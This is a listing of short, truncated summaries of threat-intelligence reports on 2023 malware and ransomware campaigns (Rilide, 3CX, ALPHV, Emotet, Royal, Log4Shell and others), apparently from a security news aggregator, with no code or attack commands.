Malicious campaigns targeting open-source npm ecosystems trigger a flood of spam, SEO poisoning, and malware infections, leading to npm instability and service outages. The operations span malware drops, referral scams tied to AliExpress, and crypto scams, und…
Category: Threat Research
Trustwave SpiderLabs uncovered Rilide, a new malware strain that hijacks Chromium-based browsers by disguising itself as a Google Drive extension and performing a wide range of actions such as monitoring history, taking screenshots, and injecting scripts to st…
Security researchers анализed a 3CX supply-chain attack and found that manipulated MSI installers of 3CXDesktopApp deliver a malicious DLL which decrypts and executes shellcode, dropping a backdoor named Gopuram along with an infostealer. Attribution points to…
ALPHV Ransomware Affiliate Targets Vulnerable Backup Installations to Gain Initial Access | Mandiant
Mandiant has observed a new ALPHV (aka BlackCat ransomware) ransomware affiliate, tracked as UNC4466, target publicly exposed Veritas Backup Exec installations, vulnerable to CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878, for initial access to victim environments. A commercial Internet scanning service identified over 8,500 installations of Veritas Backup Exec instances that are currently exposed…
Unit 42 uncovered CryptoClippy, a cryptocurrency clipper that targets Portuguese speakers by watching the clipboard for wallet addresses and replacing them with attacker-controlled addresses. The campaign delivers multi-stage PowerShell loaders via malvertisin…
Microsoft Threat Intelligence ties a destructive operation to MERCURY (also known as Mango Sandstorm) and to DEV-1084 (Storm-1084), detailing how they compromised hybrid on-premises and cloud environments and pursued irreversible disruption rather than ransom.…
ASEC analyzed phishing threats for March 19–25, 2023, finding FakePage attachments as the dominant method, followed by Downloader payloads, Worms, Infostealers, Trojans, and Exploits distributed via email. The report also lists numerous FakePage C2 URLs, commo…
CYFIRMA details FusionCore, a European Malware-as-a-Service and hacker-for-hire group, and analyzes SarinLocker ransomware linked to NecroSys and an affiliate program. The report notes SarinLocker v1.0 is still under development, targets specific file types, e…
Money Message is a newly found ransomware family that can encrypt network shares on Windows and Linux, using admin credentials embedded in its config to access network resources. It employs double extortion by exfiltrating data before encryption and publishing…
ASEC’s weekly malware statistics for March 27–April 2, 2023 show backdoors dominate at 54.9%, followed by downloaders (22.9%) and infostealers (20.6%), with ransomware and coin miners making up smaller shares. The top families were RedLine, Amadey, AgentTesla,…
Two executables drive the efile.com eFail operation: update.exe acts as a downloader and the PHP-based backdoor communicates with a remote C2 to fetch and run commands. The campaign uses PyInstaller-packed Python code, a PHP backdoor, and persistence via regis…
Trustwave SpiderLabs analyzes Emotet Epoch 4 resuming spam campaigns, including a shift to OneNote attachments and heavy obfuscation to evade scanners. The post details padding tricks, a highly obfuscated VBA macro (AutoOpen) and a decode routine, plus the ass…
Royal Ransom began surfacing in 2022 as a private group using multiple ransomware strains and has operated its own ransomware since September 2022. The analysis covers both Windows and Linux variants, their encryption workflow, and an anonymized incident-respo…
Genesis Market, a major underground marketplace for stolen credentials, browser fingerprints, and cookies, was disrupted by a multinational law enforcement operation spanning 17 countries, leading to takedown notices and arrests or contacts with users. The pos…
Mandiant analyzes CVE-2021-44228 (Log4Shell) exploitation against MobileIron Core, detailing four adversaries and their post-exploitation actions. It catalogs IOCs, maps observed behaviors to MITRE techniques, and outlines defensive guidance and validation ste…